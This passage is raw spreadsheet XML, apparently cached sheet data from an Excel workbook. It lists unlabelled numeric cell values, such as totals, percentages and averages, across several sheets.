            <v>40.625</v>
          </cell>
          <cell r="P7">
            <v>52.1354166666667</v>
          </cell>
          <cell r="Q7">
            <v>50.2922551789077</v>
          </cell>
          <cell r="R7">
            <v>192.717948717949</v>
          </cell>
          <cell r="S7">
            <v>196.715284715285</v>
          </cell>
          <cell r="T7">
            <v>188.106945513863</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>200</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2426</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>928</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>100</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3813.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>737</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>114</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4500.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>700</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>2144.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>300</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>3896.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>134</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>452</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>4428</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1879</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3969.08</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>302.597</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>239</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>289.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3440.58</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>22940.71</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8258.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="22">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>6067</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33629.8699999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>16.33</v>
          </cell>
          <cell r="M6">
            <v>290.83</v>
          </cell>
          <cell r="N6">
            <v>4484.75</v>
          </cell>
          <cell r="O6">
            <v>68.0416666666667</v>
          </cell>
          <cell r="P6">
            <v>57.7043650793651</v>
          </cell>
          <cell r="Q6">
            <v>52.6379107981221</v>
          </cell>
          <cell r="R6">
            <v>100.796080832823</v>
          </cell>
          <cell r="S6">
            <v>85.4932434755699</v>
          </cell>
          <cell r="T6">
            <v>86.117620826133</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>24</v>
          </cell>
          <cell r="M7">
            <v>274.25</v>
          </cell>
          <cell r="N7">
            <v>4296.83</v>
          </cell>
          <cell r="O7">
            <v>100</v>
          </cell>
          <cell r="P7">
            <v>54.4146825396825</v>
          </cell>
          <cell r="Q7">
            <v>50.4322769953052</v>
          </cell>
          <cell r="R7">
            <v>184.208333333333</v>
          </cell>
          <cell r="S7">
            <v>195.620783956244</v>
          </cell>
          <cell r="T7">
            <v>188.085169764687</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>300</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2126</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>1646</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>300</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3513.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>871</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>134</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>5237.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>383</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>1761.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>2896.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>2881</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>2000</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>5309</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>4421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3636.83</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>302.597</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>288.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>233.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3114.83</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>23958.38</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9671.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="23">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>2138</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>32392.1099999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>8</v>
          </cell>
          <cell r="M6">
            <v>298.83</v>
          </cell>
          <cell r="N6">
            <v>4492.75</v>
          </cell>
          <cell r="O6">
            <v>33.3333333333333</v>
          </cell>
          <cell r="P6">
            <v>56.5965909090909</v>
          </cell>
          <cell r="Q6">
            <v>52.5836844569288</v>
          </cell>
          <cell r="R6">
            <v>94.125</v>
          </cell>
          <cell r="S6">
            <v>85.7243248669812</v>
          </cell>
          <cell r="T6">
            <v>86.1318791386122</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>8</v>
          </cell>
          <cell r="M7">
            <v>282.25</v>
          </cell>
          <cell r="N7">
            <v>4304.83</v>
          </cell>
          <cell r="O7">
            <v>33.3333333333333</v>
          </cell>
          <cell r="P7">
            <v>53.4564393939394</v>
          </cell>
          <cell r="Q7">
            <v>50.3842462546816</v>
          </cell>
          <cell r="R7">
            <v>173.125</v>
          </cell>
          <cell r="S7">
            <v>194.983170947741</v>
          </cell>
          <cell r="T7">
            <v>188.057368119066</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>100</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2026</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>753</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>335</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>100</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3748.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>335</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>130</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>5442.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>200</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>1561.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1072</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>400</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>3568.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>469</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>454</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>5324</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1385</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3375.76</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>43.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>346.097</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>226.65</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>239.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>2909.61</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>22207.12</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>10184.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="24">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>4397</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>32317.9499999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>18</v>
          </cell>
          <cell r="M6">
            <v>316.83</v>
          </cell>
          <cell r="N6">
            <v>4510.75</v>
          </cell>
          <cell r="O6">
            <v>75</v>
          </cell>
          <cell r="P6">
            <v>57.3967391304348</v>
          </cell>
          <cell r="Q6">
            <v>52.6464752567694</v>
          </cell>
          <cell r="R6">
            <v>81.7777777777778</v>
          </cell>
          <cell r="S6">
            <v>85.5001104693369</v>
          </cell>
          <cell r="T6">
            <v>86.1145042398714</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>16.5</v>
          </cell>
          <cell r="M7">
            <v>298.75</v>
          </cell>
          <cell r="N7">
            <v>4321.33</v>
          </cell>
          <cell r="O7">
            <v>68.75</v>
          </cell>
          <cell r="P7">
            <v>54.1213768115942</v>
          </cell>
          <cell r="Q7">
            <v>50.4356909430439</v>
          </cell>
          <cell r="R7">
            <v>177.272727272727</v>
          </cell>
          <cell r="S7">
            <v>194.005020920502</v>
          </cell>
          <cell r="T7">
            <v>188.016189460189</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1432</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>200</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>1826</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>40</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>284</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3464.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>603</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>600</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>5445.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>231</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>1330.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>2077</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4645.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>1000</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>4324</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2925</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4471.16</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>19</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>327.097</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>255.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>312.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3903.16</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>22405.46</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9912.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="25">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>6251</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33769.7099999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>24</v>
          </cell>
          <cell r="M6">
            <v>340.83</v>
          </cell>
          <cell r="N6">
            <v>4534.75</v>
          </cell>
          <cell r="O6">
            <v>100</v>
          </cell>
          <cell r="P6">
            <v>59.171875</v>
          </cell>
          <cell r="Q6">
            <v>52.7787476722533</v>
          </cell>
          <cell r="R6">
            <v>80.8333333333333</v>
          </cell>
          <cell r="S6">
            <v>85.1714931197371</v>
          </cell>
          <cell r="T6">
            <v>86.0865538342797</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>24</v>
          </cell>
          <cell r="M7">
            <v>322.75</v>
          </cell>
          <cell r="N7">
            <v>4345.33</v>
          </cell>
          <cell r="O7">
            <v>100</v>
          </cell>
          <cell r="P7">
            <v>56.0329861111111</v>
          </cell>
          <cell r="Q7">
            <v>50.5741387337058</v>
          </cell>
          <cell r="R7">
            <v>179.625</v>
          </cell>
          <cell r="S7">
            <v>192.935708752905</v>
          </cell>
          <cell r="T7">
            <v>187.969843487146</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1940</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>496</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>1330</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>438</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3026.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>500</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4945.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>1330.394</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
